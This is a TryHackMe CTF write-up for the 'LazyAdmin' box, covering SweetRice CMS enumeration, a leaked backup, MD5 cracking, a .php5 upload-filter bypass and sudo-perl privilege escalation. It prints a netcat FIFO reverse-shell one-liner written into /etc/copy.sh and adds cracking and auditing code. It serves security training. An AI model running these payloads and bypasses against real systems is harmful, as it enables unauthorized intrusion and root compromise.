TryHackMe - LazyAdmin (Easy)
Gobuster finds a hidden directory /content that leaks the CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks the admin user's password hash. The hash is unsalted MD5, so we recover the plaintext password easily. Running Gobuster on /content, we find another hidden directory, /content/as, that has a login form. Using the leaked credential, we can access the admin panel.

In the admin panel, we find a file upload vulnerability with an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.

In the privilege escalation phase, sudo -l shows that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh, and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run the backup script with sudo perl, so that /etc/copy.sh runs as root. Then we catch a reverse shell as root.

- RHOST: 10.10.10.20
- LHOST: 10.13.12.2

(screenshot: Nmap scan)

Gobuster finds a hidden directory /content:

(screenshot: Gobuster)

Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:

(screenshot: SweetRice)
Searchsploit:

(screenshot: searchsploit)

The "Backup Disclosure" PoC says that the MySQL backup is at /inc/mysql_backup. In our case, it is at /content/inc/mysql_backup. Try to access this directory:

(screenshot: /content/inc/mysql_backup)
The manager user's password hash is leaked in this backup:

(screenshot: Password hash)

MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page where this credential can be used. Run Gobuster on the directory /content and we find a new directory, /content/as:

(screenshot: Gobuster on /content)
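The hash-cracking step above can be reproduced offline. The following is an added example, not code from the writeup or from SweetRice: it pulls MD5-shaped values out of dump text and runs a plain dictionary attack against them. The dump line, the table layout and the wordlist are constructed stand-ins (the page does not show the real backup contents), and the hash in the sample is computed from the known plaintext rather than copied from the box.

```python
import hashlib
import re
from typing import Dict, Iterable, List, Optional

# 32 lowercase hex chars: the shape of an unsalted MD5 digest in a SQL dump.
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")


def md5_hex(plaintext: str) -> str:
    return hashlib.md5(plaintext.encode("utf-8")).hexdigest()


def find_md5_hashes(dump_text: str) -> List[str]:
    """Pull every MD5-shaped value out of leaked dump text, in order, without duplicates."""
    seen: Dict[str, None] = {}
    for h in MD5_RE.findall(dump_text.lower()):
        seen.setdefault(h, None)
    return list(seen)


def crack_md5(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack. Unsalted MD5 means one cheap digest per candidate and
    no per-user salt, which is why a leaked hash like this one falls quickly."""
    target = target_hash.strip().lower()
    for candidate in wordlist:
        if md5_hex(candidate) == target:
            return candidate
    return None


def crack_dump(dump_text: str, wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map every hash found in the dump to its recovered plaintext (or None)."""
    words = list(wordlist)
    return {h: crack_md5(h, words) for h in find_md5_hashes(dump_text)}


# Constructed stand-in for the leaked mysql_backup content (the real table
# layout is not shown on the page); the hash is computed, not copied.
SAMPLE_DUMP = (
    "INSERT INTO `admin` VALUES "
    f"('manager', '{md5_hex('Password123')}', 'manager@example.com');\n"
)

# Constructed mini wordlist standing in for a real list such as rockyou.txt.
SAMPLE_WORDLIST = ["password", "admin123", "letmein", "Password123", "P@ssw0rd"]


if __name__ == "__main__":
    for h, plain in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(h, "->", plain if plain is not None else "(not in wordlist)")
```

Swap SAMPLE_WORDLIST for a real list read from disk and the loop is the whole attack; that it finishes in milliseconds is the point the writeup makes about storing admin passwords as bare MD5.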
This directory has a login form:

(screenshot: /content/as)

Try the credential we just found and now we have access to the admin panel:

(screenshot: Admin Panel)
There is an arbitrary file upload exploit for SweetRice:

(screenshot: Arbitrary file upload)

It suggests that .php5 bypasses the upload filter, which only blocks the .php extension while the web server still executes .php5 as PHP:

(screenshot: .php5)

Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:

(screenshot: File upload)
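The bypass works because the filter is a denylist. The following is an added example, not SweetRice's code or anything from the writeup: a denylist check in the spirit of the one defeated above, next to the allowlist check that would have stopped the .php5 upload, plus a server-chosen storage name. The filenames and extension sets are constructed for the demo.

```python
import posixpath
import secrets
from typing import List

# Denylist in the spirit of the filter the bypass above defeats: it names the
# obvious PHP extension and nothing else (constructed, not SweetRice's code).
DENIED_EXTENSIONS = {".php"}

# Allowlist for a media upload endpoint: only extensions the feature needs.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def extension_of(filename: str) -> str:
    """Last extension of the basename, lowercased; ignores any directory part."""
    return posixpath.splitext(posixpath.basename(filename))[1].lower()


def denylist_allows(filename: str) -> bool:
    """Weak check: anything not on the denylist goes through, so .php5, .phtml
    and other alternate PHP extensions pass untouched."""
    return extension_of(filename) not in DENIED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: only known-harmless extensions are accepted."""
    return extension_of(filename) in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Server-chosen name for an accepted upload: random stem plus the validated
    extension, so the client never controls where or as what the file lands."""
    if not allowlist_allows(filename):
        raise ValueError(f"rejected upload: {filename}")
    return secrets.token_hex(16) + extension_of(filename)


def bypasses(filenames: List[str]) -> List[str]:
    """Names the denylist lets through that the allowlist would refuse."""
    return [f for f in filenames if denylist_allows(f) and not allowlist_allows(f)]


# Constructed filenames for the demo.
SAMPLE_UPLOADS = [
    "cat.jpg",
    "php-reverse-shell.php",
    "php-reverse-shell.php5",
    "shell.phtml",
    "../../php-reverse-shell.PHP5",
]

if __name__ == "__main__":
    for name in SAMPLE_UPLOADS:
        print(f"{name:32} denylist={denylist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
    print("bypasses:", bypasses(SAMPLE_UPLOADS))
```

Whether a given alternate extension is actually executed depends on the server's handler configuration, which is why the fix is an allowlist of what the endpoint needs rather than a longer denylist of what it fears.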
Start a pwncat listener and catch a reverse shell as www-data:

(screenshot: www-data shell)
Run sudo -l:

(screenshot: sudo -l)
The file /home/itguy/backup.pl executes sh /etc/copy.sh. Since sudo -l lets us run Perl as root, running backup.pl through sudo executes /etc/copy.sh as root, and /etc/copy.sh is world-writable:

(screenshot: /etc/copy.sh)
Store a Netcat reverse shell payload in /etc/copy.sh (this overwrites the original script):

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh

Start a pwncat listener on port 1337 and execute backup.pl as root:

sudo /usr/bin/perl /home/itguy/backup.pl

Now we have a root shell:

(screenshot: root shell)
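The whole escalation rests on one condition: a script that a root-runnable wrapper invokes is writable by everyone. The following is an added example, not part of the writeup: it finds the .sh paths a wrapper script mentions and reports which of them are world-writable, then reproduces the backup.pl/copy.sh layout in a temporary directory with one 0777 script (the bug) and one 0755 script (the fix). The regex, filenames and wrapper contents are assumptions for the demo; the real backup.pl is not shown on the page.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Absolute paths ending in .sh, as they appear in a line like: system("sh /etc/copy.sh")
SCRIPT_PATH_RE = re.compile(r"(/[\w./-]+\.sh)\b")


def referenced_scripts(wrapper_source: str) -> List[str]:
    """Absolute *.sh paths mentioned by a wrapper script's source text."""
    return sorted(set(SCRIPT_PATH_RE.findall(wrapper_source)))


def is_world_writable(path: str) -> bool:
    """True if the file's mode has the 'other' write bit (the /etc/copy.sh condition)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_wrapper(wrapper_path: str) -> Dict[str, bool]:
    """For each script the wrapper invokes and that exists, report whether it is
    world-writable. Any True entry is a root-shell primitive when the wrapper
    itself can be run as root (here: via 'sudo /usr/bin/perl')."""
    with open(wrapper_path, encoding="utf-8") as f:
        source = f.read()
    return {p: is_world_writable(p) for p in referenced_scripts(source) if os.path.exists(p)}


def demo() -> Dict[str, bool]:
    """Constructed reproduction in a temp dir: a backup.pl-style wrapper that
    calls one 0777 script (the bug) and one 0755 script (the fix)."""
    d = tempfile.mkdtemp(prefix="lazyadmin_")
    weak = os.path.join(d, "copy.sh")
    fixed = os.path.join(d, "copy_fixed.sh")
    for path, mode in ((weak, 0o777), (fixed, 0o755)):
        with open(path, "w", encoding="utf-8") as f:
            f.write("#!/bin/sh\necho backup\n")
        os.chmod(path, mode)
    wrapper = os.path.join(d, "backup.pl")
    with open(wrapper, "w", encoding="utf-8") as f:
        f.write(f'#!/usr/bin/perl\nsystem("sh {weak}");\nsystem("sh {fixed}");\n')
    return {os.path.basename(p): w for p, w in audit_wrapper(wrapper).items()}


if __name__ == "__main__":
    for name, writable in demo().items():
        print(f"{name}: {'WORLD-WRITABLE' if writable else 'ok'}")
```

Pointing audit_wrapper at every script listed by sudo -l is a quick way to find this class of misconfiguration on a box; the fix on the defensive side is root ownership and mode 0755 (or tighter) on anything a privileged job executes.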